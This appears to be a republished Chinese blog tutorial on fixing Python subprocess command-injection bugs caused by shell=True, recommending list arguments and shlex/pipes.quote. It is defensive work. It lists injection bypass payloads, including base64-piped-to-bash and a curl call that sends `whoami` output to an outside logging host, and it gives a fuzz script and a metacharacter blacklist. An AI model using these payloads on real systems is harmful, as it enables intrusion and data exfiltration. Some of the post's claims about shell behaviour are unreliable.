漏洞?在我Python眼里是不存在的!修复Python任意命令执行漏洞!

1 前言

今天遇到一个不好做白名单的Python命令执行漏洞修复的问题。由于是shell=True导致的任意命令执行,一开始大胆猜测将True改为False即可。经过测试确实是这样,但是参数需要放在list里,稍微有点麻烦。

后来考虑,还可以做黑名单,过滤掉特殊字符,那就写fuzz脚本跑那些需要过滤的字符。最后觉得黑名单方式可能会被绕过,就看官方文档,发现了一个牛逼的修复方法,利用shlex.quote()在命令的参数两边加上一对单引号。

进群:548377875  即可获取数十套PDF哦!

2 测试环境

  • CentOS Linux release 7.3.1611 (Core)
  • Python 2.7.5

本文在没有特殊描述环境下,都是在以上环境测试。

3 shell值为True和False的区别

先来看看造成命令执行的代码

s=subprocess.Popen('id',shell=True,stderr=subprocess.PIPE,stdout=subprocess.PIPE)
print(s.communicate()) # 输出结果,并kill产生的新进程

当shell=True,并且第一个参数外部可控,那么就能造成任意命令执行。

3.1 shell为False

改为False,任意命令执行漏洞就会被修复。但确实是这样

>>> s=subprocess.Popen(["ls",";id"],shell=False,stdout=subprocess.PIPE)
>>> s.communicate()
('','ls: cannot access ;id: No such file or directory
')

这样即使;id可控,也不能任意命令执行。

执行cat /etc/passwd,如果命令要跟参数,第一个参数必须是一个list。

>>> import subprocess
>>> s=subprocess.Popen(['cat','/etc/passwd'],stdout=subprocess.PIPE)

此时,查看python的进程情况:

[root@sec ~]# ps -ef | grep 24593
root 24593 24536 0 11:28 pts/0 00:00:00 python
root 24594 24593 0 11:28 pts/0 00:00:00 [cat] 

可以看到python有一个子进程叫做(cat)。证明,shell=False是python作为父进程执行了cat这个bin文件,产生一个子进程。测试的时候,如果要kill刚产生的子进程,使用s.communicate(),并查看返回结果。

测试发现,当shell=True,并且subprocess.Popen的第一个参数为一个list时,python进程会被卡死。

3.2 shell为True

import subprocess
s=subprocess.Popen('whoami | wc -l',stdout=subprocess.PIPE)

可以看到,Python新建了一个叫sh的子进程,该进程执行了whoami | wc -l命令。继续执行python命令s.communicate(),刚产生的子进程就被kill了。

[root@sec ~]# ps -ef | grep 16323
root 16323 16256 0 14:20 pts/0 00:00:00 python
root 16379 16323 0 14:26 pts/0 00:00:00 [sh] 

所以,证明,当shell=True时,Python调用/bin/sh去执行命令。

但是有一个特例,当shell=True,执行一个没有任何参数的命令的情况和shell=False一样。说明,没有任何参数的命令,设置shell=True,并没有生效。

s=subprocess.Popen('whoami',stdout=subprocess.PIPE)

再查看发现,python的子进程并没有sh,而是[[whoami] ],所以证明了,没有任何参数的命令,设置shell=True,并没有新建一个bash去执行该命令。

[root@sec ~]# ps -ef | grep whoami
root 16200 15484 0 14:13 pts/0 00:00:00 [whoami] 
root 16203 11641 0 14:14 pts/1 00:00:00 grep --color=auto whoami
[root@sec ~]# ps -ef | grep 15484
root 15484 10092 0 12:24 pts/0 00:00:00 python
root 16200 15484 0 14:13 pts/0 00:00:00 [whoami] 

3.3 总结二者区别

比较简单粗暴的可以理解为,True用/bin/sh执行,False是Python直接调用命令,而不会通过bash。

具体的细节区别:

  • 当执行的命令没有参数时,无论是否设置shell=True,python直接执行该命令,而不是通过/bin/sh
  • 当shell=True,并且命令存在参数时,python调用/bin/sh执行命令
  • 当shell=True,并且subprocess.Popen的第一个参数为一个list时,python进程会被卡死
  • 如果设置shell为False,并且想执行带参数的命令,第一个参数必须是一个list

4 Linux命令执行绕过

现在有个目标是,利用ls xx来执行id命令,xx可控。fuzz后的结果:

ls | id
ls ; id
ls & id
ls 回车 id
ls `id` 
ls ` id` 前面加了一个空格
ls `id` 反斜杠 id等价于id
ls $(id) 

下面这几种姿势是在网上的相关paper看到的,补充下,不过还是会利用| & ;等分割符。

ls | a=i;b=d;$a$b 拼接
ls | echo aWQ=| base64 -d | bash 利用base64
ls | curl test.joychou.org/`whoami` 利用dnslog或者http web log

5 漏洞修复

所以看来,设置shell=False并不能修复命令执行,并且还会影响我们想执行的正常命令。

那就做特殊字符过滤吧。从上面的绕过姿势来看,需要过滤的字符总结如下:

ascii为10
;
|
&
`
$

(
)

fuzz的代码大概如下,如果有特殊需求,还需要酌情修改

#coding: utf-8
import subprocess
def exec_cmd(cmd):
p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
res_msg,res_err = p.communicate()
res = res_msg + res_err
return res
def main():
for i in range(1,256):
cmd = 'echo 111 ' + chr(i) + ' id'
if 'uid' in exec_cmd(cmd):
print chr(i),i,cmd
for i in range(32,126): # 可见ascii码
if chr(i) == 'u' or chr(i) == '|' or chr(i) == '&' or chr(i) == ';' or i == 10:
continue
for j in range(32,126):
cmd = 'echo 111 ' + chr(i) + 'id' + chr(j) 
if 'uid' in exec_cmd(cmd):
print chr(i),cmd
if __name__ == '__main__':
main()

综上,检测代码

def check_cmd_exec(input):
'''
 * input为输入字符串
 * 检测到危险字符串,返回True,否则返回False
 * author: JoyChou
 * date: 2018-03-21
 '''
res = ''
blacklist = '`$()&;|'
for i,ch in enumerate(input):
if ord(ch) == 10 or ch in blacklist:
return True
return False

不过,话说,有没有自带比较简单粗暴的过滤函数之类的?既能保证功能正常,也能保证安全性。

6 官方修复

最后在官方文档上看到这样一个描述:

When using shell=True,pipes.quote() can be used to properly escape whitespace and shell Metacharacters in strings that are going to be used to construct shell commands.

意思就是,用pipes.quote()过滤就好了。

不过,这个库已经被官方废弃了,官方推荐使用shlex.quote()。 其实pipes.quote()和shlex.quote()这两个功能一样,都是当参数有特殊字符时,在参数两边加上一对''。

>>> a = shlex.quote('xxaa~')
>>> a
"'xxaa~'"
>>> a = shlex.quote('xxaa')
>>> a
'xxaa'

避免命令的原理,看下这个实例就懂了。

>>> filename = 'somefile; whoami'
>>> command = 'ls -l {}'.format(quote(filename))
>>> print(command)
ls -l 'somefile; whoami'

需要注意,只能用在参数上。并且Python2没有shlex,但是Python2和3都有pipes,所以想都适配就用pipes。

7 总结

推荐两种修复方式:

  • shell=True,使用pipes.quote()对参数进行过滤
  • shell=False,参数使用list。缺点是写参数时会稍微麻烦点

漏洞?在我Python眼里是不存在的!修复Python任意命令执行漏洞!

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


我最近重新拾起了计算机视觉,借助Python的opencv还有face_recognition库写了个简单的图像识别demo,额外定制了一些内容,原本想打包成exe然后发给朋友,不过在这当中遇到了许多小问题,都解决了,记录一下踩过的坑。 1、Pyinstaller打包过程当中出现warning,跟d
说到Pooling,相信学习过CNN的朋友们都不会感到陌生。Pooling在中文当中的意思是“池化”,在神经网络当中非常常见,通常用的比较多的一种是Max Pooling,具体操作如下图: 结合图像理解,相信你也会大概明白其中的本意。不过Pooling并不是只可以选取2x2的窗口大小,即便是3x3,
记得大一学Python的时候,有一个题目是判断一个数是否是复数。当时觉得比较复杂不好写,就琢磨了一个偷懒的好办法,用异常处理的手段便可以大大程度帮助你简短代码(偷懒)。以下是判断整数和复数的两段小代码: 相信看到这里,你也有所顿悟,能拓展出更多有意思的方法~
文章目录 3 直方图Histogramplot1. 基本直方图的绘制 Basic histogram2. 数据分布与密度信息显示 Control rug and density on seaborn histogram3. 带箱形图的直方图 Histogram with a boxplot on t
文章目录 5 小提琴图Violinplot1. 基础小提琴图绘制 Basic violinplot2. 小提琴图样式自定义 Custom seaborn violinplot3. 小提琴图颜色自定义 Control color of seaborn violinplot4. 分组小提琴图 Group
文章目录 4 核密度图Densityplot1. 基础核密度图绘制 Basic density plot2. 核密度图的区间控制 Control bandwidth of density plot3. 多个变量的核密度图绘制 Density plot of several variables4. 边
首先 import tensorflow as tf tf.argmax(tenso,n)函数会返回tensor中参数指定的维度中的最大值的索引或者向量。当tensor为矩阵返回向量,tensor为向量返回索引号。其中n表示具体参数的维度。 以实际例子为说明: import tensorflow a
seaborn学习笔记章节 seaborn是一个基于matplotlib的Python数据可视化库。seaborn是matplotlib的高级封装,可以绘制有吸引力且信息丰富的统计图形。相对于matplotlib,seaborn语法更简洁,两者关系类似于numpy和pandas之间的关系,seabo
Python ConfigParser教程显示了如何使用ConfigParser在Python中使用配置文件。 文章目录 1 介绍1.1 Python ConfigParser读取文件1.2 Python ConfigParser中的节1.3 Python ConfigParser从字符串中读取数据
1. 处理Excel 电子表格笔记(第12章)(代码下载) 本文主要介绍openpyxl 的2.5.12版处理excel电子表格,原书是2.1.4 版,OpenPyXL 团队会经常发布新版本。不过不用担心,新版本应该在相当长的时间内向后兼容。如果你有新版本,想看看它提供了什么新功能,可以查看Open
1. 发送电子邮件和短信笔记(第16章)(代码下载) 1.1 发送电子邮件 简单邮件传输协议(SMTP)是用于发送电子邮件的协议。SMTP 规定电子邮件应该如何格式化、加密、在邮件服务器之间传递,以及在你点击发送后,计算机要处理的所有其他细节。。但是,你并不需要知道这些技术细节,因为Python 的
文章目录 12 绘图实例(4) Drawing example(4)1. Scatterplot with varying point sizes and hues(relplot)2. Scatterplot with categorical variables(swarmplot)3. Scat
文章目录 10 绘图实例(2) Drawing example(2)1. Grouped violinplots with split violins(violinplot)2. Annotated heatmaps(heatmap)3. Hexbin plot with marginal dist
文章目录 9 绘图实例(1) Drawing example(1)1. Anscombe’s quartet(lmplot)2. Color palette choices(barplot)3. Different cubehelix palettes(kdeplot)4. Distribution
Python装饰器教程展示了如何在Python中使用装饰器基本功能。 文章目录 1 使用教程1.1 Python装饰器简单示例1.2 带@符号的Python装饰器1.3 用参数修饰函数1.4 Python装饰器修改数据1.5 Python多层装饰器1.6 Python装饰器计时示例 2 参考 1 使
1. 用GUI 自动化控制键盘和鼠标第18章 (代码下载) pyautogui模块可以向Windows、OS X 和Linux 发送虚拟按键和鼠标点击。根据使用的操作系统,在安装pyautogui之前,可能需要安装一些其他模块。 Windows: 不需要安装其他模块。OS X: sudo pip3
文章目录 生成文件目录结构多图合并找出文件夹中相似图像 生成文件目录结构 生成文件夹或文件的目录结构,并保存结果。可选是否滤除目录,特定文件以及可以设定最大查找文件结构深度。效果如下: root:[z:/] |--a.py |--image | |--cat1.jpg | |--cat2.jpg |
文章目录 VENN DIAGRAM(维恩图)1. 具有2个分组的基本的维恩图 Venn diagram with 2 groups2. 具有3个组的基本维恩图 Venn diagram with 3 groups3. 自定义维恩图 Custom Venn diagram4. 精致的维恩图 Elabo
mxnet60分钟入门Gluon教程代码下载,适合做过深度学习的人使用。入门教程地址: https://beta.mxnet.io/guide/getting-started/crash-course/index.html mxnet安装方法:pip install mxnet 1 在mxnet中使
文章目录 1 安装2 快速入门2.1 基本用法2.2 输出图像格式2.3 图像style设置2.4 属性2.5 子图和聚类 3 实例4 如何进一步使用python graphviz Graphviz是一款能够自动排版的流程图绘图软件。python graphviz则是graphviz的python实